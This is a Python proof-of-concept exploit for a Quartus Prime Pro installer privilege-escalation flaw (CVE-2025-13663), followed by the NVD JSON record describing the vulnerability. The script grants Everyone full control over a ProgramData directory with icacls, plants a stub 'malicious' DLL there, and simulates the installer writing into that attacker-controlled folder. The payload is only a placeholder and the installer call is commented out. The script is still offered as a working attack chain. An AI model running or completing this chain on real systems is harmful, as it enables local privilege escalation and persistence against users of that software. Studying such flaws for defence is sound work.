CVE-2025-13663

# CVE-2025-13663 PoC - Quartus Prime Pro Installer Privilege Escalation # This PoC demonstrates the permission check bypass in Quartus Prime Pro Installer import os import subprocess import shutil import ctypes import sys def create_malicious_directory(target_path): """Create target directory with overly permissive ACL""" if not os.path.exists(target_path): os.makedirs(target_path) # Set Everyone full control on the directory # This simulates what an attacker can do as a low-privilege user cmd = f'icacls "{target_path}" /grant Everyone:F /T' subprocess.run(cmd, shell=True, check=True) print(f'[+] Created directory with Everyone full control: {target_path}') def prepare_exploit_payload(target_path): """Prepare malicious DLL to be planted during installation""" malicious_dll = os.path.join(target_path, 'QuartusPrimeHook.dll') # In real attack, this would be a DLL with malicious code dll_content = b'MZ' + b'\x00' * 100 # Minimal PE header with open(malicious_dll, 'wb') as f: f.write(dll_content) print(f'[+] Prepared malicious DLL: {malicious_dll}') return malicious_dll def trigger_installation(target_path): """Trigger Quartus Prime Pro installation""" quartus_installer = 'C:\\intelquartus\\quartus_pro_setup.exe' if os.path.exists(quartus_installer): cmd = f'"{quartus_installer}" --install-dir="{target_path}"' print(f'[+] Triggering installation: {cmd}') # subprocess.run(cmd, shell=True) else: print(f'[-] Installer not found at: {quartus_installer}') print('[+] Simulating installation process...') # Simulate installation writing files to controlled directory for i in range(10): fake_dll = os.path.join(target_path, f'component_{i}.dll') with open(fake_dll, 'wb') as f: f.write(b'MZ' + b'\x00' * 100) print(f'[+] Installation completed - files written to controlled directory') def main(): print('=== CVE-2025-13663 Privilege Escalation PoC ===') print('[!] For authorized security testing only') target_path = 'C:\\ProgramData\\IntelQuartusPrime' # Step 1: Create directory with weak permissions create_malicious_directory(target_path) # Step 2: Prepare payload prepare_exploit_payload(target_path) # Step 3: Trigger vulnerable installation trigger_installation(target_path) print('[+] Attack chain completed') print('[+] The installation process wrote files to a directory with weak permissions') print('[+] Attacker can now modify installed files or plant persistence mechanisms') if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-13663", "sourceIdentifier": "04c0172e-9735-4a9d-a92a-fe01fa863447", "published": "2025-12-11T21:15:46.307", "lastModified": "2026-01-12T15:08:30.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Under certain circumstances, the Quartus Prime Pro Installer for Windows does not check the permissions of the Quartus target installation directory if the target installation directory already exists."}], "metrics": {"cvssMetricV40": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-279"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:quartus_prime:*:*:*:*:pro:*:*:*", "versionEndExcluding": "25.1", "matchCriteriaId": "465646C1-E706-4FAE-945B-45AAC9013F2A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.altera.com/security/security-advisory/asa-0001", "source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "tags": ["Vendor Advisory"]}]}}